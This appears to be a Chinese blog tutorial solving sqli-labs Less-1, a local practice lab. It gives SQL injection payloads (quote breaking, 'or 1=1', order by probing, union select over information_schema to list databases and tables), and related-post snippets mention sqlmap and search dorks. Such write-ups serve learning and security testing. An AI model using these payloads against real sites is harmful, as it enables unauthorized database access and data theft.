mysql注入less-1

最新推荐文章于 2022-05-10 11:17:10 发布
最新推荐文章于 2022-05-10 11:17:10 发布
阅读量372 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MIGENGKING/article/details/96506465
版权

我们在PHPstudy软件搭好环境后,打开PHPstudy并访问:http://127.0.0.1链接
并找到相关目录(我的目录为sqli-labs-master):

在这里插入图片描述点进去往下拉就找到第一道题:
在这里插入图片描述
打开题目我们可以看到:
在这里插入图片描述

然后我们可以在“ http://127.0.0.1/sqllib/Less-1/”后面直接添加一个 “?id=1”,
来看一下效果:

在这里插入图片描述

输入“?id=1”之后我们就得到了题目的用户名还有用户密码:

我们可以在 http://127.0.0.1/sqllib/Less-5/?id=1 后面直接添加一个 ‘ ,来看一下效果:

在这里插入图片描述
从上述错误当中,我们可以看到提交到 sql 中的 1’在经过 sql 语句构造后形成 ‘1’’ LIMIT 0,1,
多加了一个 ’ 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何
将多余的 ‘ 去掉呢?
尝试 ‘or 1=1–+

在这里插入图片描述

此时构造的 sql 语句就成了

select from information_schema where id=‘1’or 1=1–+’ LIMIT 0,1

在这里插入图片描述
此处可以利用 “ 'order by ”。Order by 对前面的数据进行排序,我们就只能用“'order by 3”,超过 3 就会报错。
‘order by 4–+的结果显示结果超出。(?id=1’order by 3) 说明只有三列数据:

在这里插入图片描述

图片

在这里插入图片描述

此外,此处介绍 union 联合注入,union 的作用是将两个 sql 语句进行联合。Union 可以从
下面的例子中可以看出,强调一点:union 前后的两个 sql 语句的选择列数要相同才可以。U
nion all 与 union 的区别是增加了去重的功能。我们这里根据上述 background 的知识,进行
information_schema 知识的应用。
http://127.0.0.1/sqllib/Less-1/?id=-1’union select 1,2–+
当 id 的数据在数据库中不存在时,(此时我们可以 id=-1,两个 sql 语句进行联合操作时,
当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返
回了我们构造的 union 的数据。

这里我们先看看登录页面:

在这里插入图片描述

回显位为第二和第三个数:由上面我们知道共有列数据,说明只有两列数据有内容

在这里插入图片描述
接下来查看数据库的名称:
爆数据库的网址是:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,group_concat(schema_name),3 from information_schema.schemata–+”
但这道题的SQL语句为:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1”

在这里插入图片描述

接着爆 security 数据库的数据表
http://127.0.0.1/sqllib/Less-1/?id=-1'union select 1,group_concat(table_name),3 f
rom%20information_schema.tables%20where%20table_schema=%27security%27–+
此时的 sql 语句为 SELECT * FROM users WHERE id=’-1’union select 1,group_concat(table_n
ame),3 from information_schema.tables where table_schema=’security’–+ LIMIT 0,1

(2)系统函数
介绍几个常用函数:

  1. version()——MySQL 版本

  2. user()——数据库用户名

  3. database()——数据库名

  4. @@datadir——数据库路径

  5. @@version_compile_os——操作系统版本

  6. database()——数据库名

启动 mysql,然后通过查询检查下数据库:

在这里插入图片描述

这个实验用到的数据库名为 security,所以我们选择 security 来执行命令。

在这里插入图片描述

我们可以查看下这个数据库中有哪些表(SQL中表用tables)

在这里插入图片描述

现在我们可以看到这里有四张表,然后我们来看下这张表的结构。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在继续进行前台攻击时,我们想讨论下系统数据库,即 information_schema。所以我们使用它:

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

让我们来看下表格。

在这里插入图片描述

现在我们先来枚举这张表

desc tables;

在这里插入图片描述

现在我们来使用这个查询:
“select table_name from information_schema.tables where table_schema =“security”;”
在这里插入图片描述

使用这个查询,我们可以下载到表名。
Mysql 有一个系统数据库 information_schema,存储着所有的数据库的相关信息,一般的,
我们利用该表可以进行一次完整的注入。以下为一般的流程。
猜数据库
select schema_name from information_schema.schemata
猜某库的数据表
select table_name from information_schema.tables where table_schema=’xxxxx’
猜某表的所有列
Select column_name from information_schema.columns where table_name=’xxxxx’
获取某列的内容
Select *** from ****

网址:“http://127.0.0.1/sqli-labs-master/Less-11/”

MIGENGKING
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Less-1(sql注入)
qq_44598397的博客
03-13 375
Less-1 源码: 1、输入: http://127.0.0.1/sqlilabs/Less-1/?id=1’ 经过URL编码过后格式变为(http://127.0.0.1/sqlilabs/Less-1/?id=1') (页面出现错误的原因是因为多了一个’号而源代码变成多了一个分号提前截止) 2、后面输入or 1=1 --+后面把’后的注释掉(–+表注释 (–空格)在SQL内表示注释,但在...
SQL注入——Less-1(学习笔记)
qq_41759633的博客
07-30 636
首先我们需要了解什么是数据库注入以及其原理,我会在后面的文章中更新内容 下面进去sql-less的第一关 字符型注入漏洞 进入页面之后就是这个页面在?id=1后面加上单引号来判断是否存在注入漏洞 但是其页面返回错误那么加上一个注释符–+返回以下页面 可以看到加上注释符后页面返回正常那么接下来我们使用 roder by *来判断该注入漏洞存在字段数 可以看到在测试order by 3返回正常...
SQL注入——Less-1
一凡凡凡人的博客
09-14 1902
                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!   打开主页进入第一关,提示输入参数id及它的值, 传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码 我们可以通过查看数据库进行验证 这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的...
Mysql注入工具-yellowcong
01-21 2677
常用的sql注入工具,下面写了三种,1、sqliv;2sqlmap,3、havij(这款是界面的,不是脚本的那种扫描漏洞)。sqlmap这一款,这国内外都是很有名气的。 注入的url监测-- 通过这种方式 发现 这种类似url的网站 inurl:jsp?page= inurl:asp?id=sqliv准备必须先装好python和pip,才可以用sqliv下载#管网地址 https://github.
mysql less_mysql
weixin_39919948的博客
01-27 266
视图(不常用)SELECT*FROM(SELECTnid,NAMEFROMtb1WHEREnid> 2) AS AWHEREA. NAME> 'wzc';临时表搜索1、创建视图--格式:CREATE VIEW 视图名称 AS SQL语句CREATE VIEW v1 ASSELET nid,nameFROMAWHEREnid> 42、删除视图--格式:DROP VIEW 视图名称...
mysql-injection.pdf
03-31
- “BasicChallenges”可能是介绍基础注入技术的部分,如基础的输入型注入(Less-1至Less-4)。 - “Background-2盲注的讲解”可能是指盲注技术的介绍,这是一种不需要根据数据库的错误提示来进行注入的技术。 - ...
第八节 Mysql POST基于错误注入-01
09-15
Mysql POST基于错误注入 本节课程主要讲解了Mysql POST基于错误注入的攻击技术,包括使用Burpsuite抓取HTTP请求、POST基于错误单引号注入和双引号注入、Sqlmap安全测试等。 在Web应用安全测试中,Burpsuite是一款...
SQL 注入天书.pdf
08-06
Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本攻击手法。 **盲注讲解(Blind Injection)** Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在...
第十八节 绕过去除注释符的SQL注入-01
最新发布
09-15
`http://127.0.0.1/sqli/Less-23/?id=-1' union select 1,database(),'304` Sqlmap安全检测 Sqlmap是当前最流行的SQL注入攻击工具之一。使用Sqlmap,可以进行自动化的SQL注入攻击和检测。例如: `sqlmap -u "URL...
mysql注入工具;神器
08-25
mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器
PHP+MySql注入工具
02-01
计算机学习PHP+MySql注入工具,放心用吧'_'
河马MySQL注入工具v1.1
05-11
河马MySQL注入工具v1.1,通过web前端应用获取数据库的内容。 support : UNION support : Error based
一个注入工具
07-31
一个注入工具,很好用,功能强大,全中文。找了好久才找到的
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
less-1 字符型注入
weixin_52348955的博客
10-30 3185
url编码:空格为20%,'为27%,#为23% 字符型注入的原理和判断方法在最下面的附录里: 第一步: ?id=999999999' union select 1,2,database()# id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果 database()前面加了1,2,的原因请看附录 h
sql注入练习——Less-1
nzw1134864657的博客
10-14 560
1.判断是否存在注入 输入“?id=1”,发现有变化,说明存在注入 2.判断闭合字符,注释后面的内容 输入“ ?id=1’ ” http://127.0.0.1/sqli-labs-master/Less-1/?id=1’%23 3.判断列数 使用order by(排序),来判断有几列数据,随便写,先写order by 10,回显错误,则说明列数是小于5,尝试5,回显结果仍是错误的,再尝试...
mysql less_MySQL 存储 schema less的数据
weixin_40003451的博客
02-07 98
MySQL 存储 schema less的数据from timyang’s blog 综合取舍,使用MySQL来存储key/value(schema-less)数据,value中可以放:Python dictJSON object 实际friendfeed存放的是zlib压缩的Python dict数据,当然这种绑定一种语言的做法具有争议性。相关文档:/********************...
Mysql基础知识以及入门sqlilabs靶场 less1
wcl20010的博客
05-10 337
首先讲一下SQL注入产生的原因:前台用户输入的数据传到服务端时,没有严格判断,过滤等,导致传进来的数据被拼接到sql语句中被执行,从而导致数据泄露,可能会服务器瘫痪。 SQL注入的分类: 从反馈的结果来看 有回显型 无回显型/盲注 攻击手法上来看: 联合查询注入:union select 堆叠注入mysql_multi_query()函数支持多条sql语句同时执行,就是多个 ; 分隔,成堆的执行sql语句,如: PHP为了防止sql堆叠注入机制,往往使用调用数据库的函数是mysqli_ que
SQL注入实战:MySQL注入天书-Sqli-labs详解
Less-1到Less-16涵盖了基础的SQL语法、查询构造以及如何识别和利用可能存在的注入漏洞。 2. **高级注入** (page-2 Advanced Injection) 随着难度的提升,这部分涉及更复杂的注入技术,如Less-23至Less-28a,涵盖了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值